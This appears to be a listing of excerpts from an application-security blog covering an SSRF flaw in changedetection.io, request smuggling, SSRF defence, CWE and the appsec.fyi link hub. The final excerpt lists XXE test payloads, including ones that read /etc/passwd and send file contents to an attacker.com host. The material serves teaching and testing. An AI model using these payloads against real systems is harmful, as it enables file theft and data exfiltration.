Application-Security

A high-severity SSRF vulnerability (CVSS 8.6) was disclosed on February 25, 2026 in changedetection.io, a popular open-source tool for monitoring web page changes. The bug is a textbook example of a failed allowlist/denylist approach to URL validation — and the default unauthenticated configuration makes it exploitable by anyone with network access to the instance. What is changedetection.io? changedetection.io is a self-hosted service that watches URLs for content changes and alerts you when something changes. It’s commonly used by developers, researchers, and sysadmins to monitor pages, APIs, and dashboards. The tool fetches URLs on your behalf — which is exactly the trust relationship SSRF attacks exploit. ...

As security researchers and professionals, we often find ourselves searching through countless resources, documentation, and references while working on projects or investigating vulnerabilities. Having a well-organized collection of links and resources can be invaluable for both learning and day-to-day work. This is exactly what appsec.fyi provides - a thoughtfully curated collection of application security resources that serves as a go-to reference point for security professionals. What is AppSec.fyi? AppSec.fyi describes itself as “a somewhat curated list of links to various topics in appsec. Mostly, but not always related to application security.” This humble description understates the value of what the site offers. At its core, it’s a centralized hub that organizes security knowledge across multiple domains, making it easy to find authoritative sources and reference materials for common vulnerabilities and security topics. ...

HTTP Request Smuggling (HRS) is a powerful web application vulnerability that exploits discrepancies in how different servers or intermediaries parse and handle HTTP requests. This misalignment can allow an attacker to “smuggle” a malicious request through a front-end server (such as a load balancer, proxy, or CDN) so that it is interpreted differently by the back-end server. How HTTP Request Smuggling Works Modern web applications often rely on chains of intermediaries — proxies, reverse proxies, CDNs, and application servers. These components must all agree on where one HTTP request ends and the next begins. If they disagree, attackers can craft specially malformed requests that cause desynchronization. ...

Server-Side Request Forgery (SSRF) is a type of security vulnerability that allows an attacker to send crafted requests from a vulnerable server to internal or external resources. This can lead to unauthorized access to sensitive data, manipulation of server behavior, or even exploitation of other services within the network. SSRF exploits the trust that a server has in its own requests, allowing attackers to leverage this trust to perform actions that would typically be restricted. ...

Defending Your Web Applications Against Server-Side Request Forgery (SSRF) Attacks In today’s interconnected digital landscape, web applications face a myriad of security threats. One often overlooked but potentially devastating vulnerability is Server-Side Request Forgery (SSRF). Did you know that, according to a recent report, SSRF attacks have increased by a staggering 270% in the past year alone? In this blog post, we’ll dive into what SSRF is, how it can impact your web applications, and most importantly, the steps you can take to defend against these insidious attacks. ...

Common Weakness Enumeration (CWE) is a system that identifies and categorizes common software and hardware vulnerabilities. It provides a standardized way of describing and categorizing these weaknesses, making it easier for developers, security analysts, and other professionals to understand, discuss, and address them. CWE was developed by the MITRE Corporation, a nonprofit organization that operates research and development centers sponsored by the U.S. government. It includes a comprehensive list of known security weaknesses, organized into categories based on the type of vulnerability. ...

Here are some common XXE payloads that can be used to test for XXE- Basic payload: <!DOCTYPE replace [<!ENTITY example "Hello World">]> Retrieving sensitive files: <!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]> Retrieving files via FTP: <!DOCTYPE replace [<!ENTITY example SYSTEM "ftp://username:password@ftp.example.com/file">]> Retrieving files via HTTP: <!DOCTYPE replace [<!ENTITY example SYSTEM "http://example.com/file">]> Sending data to a remote server: <!DOCTYPE replace [<!ENTITY example SYSTEM "http://attacker.com/?data=%file_contents;">]> Recursive payload: <!DOCTYPE replace [<!ENTITY example "Hello &example2;"><!ENTITY example2 "&example;&example;&example;">]> ...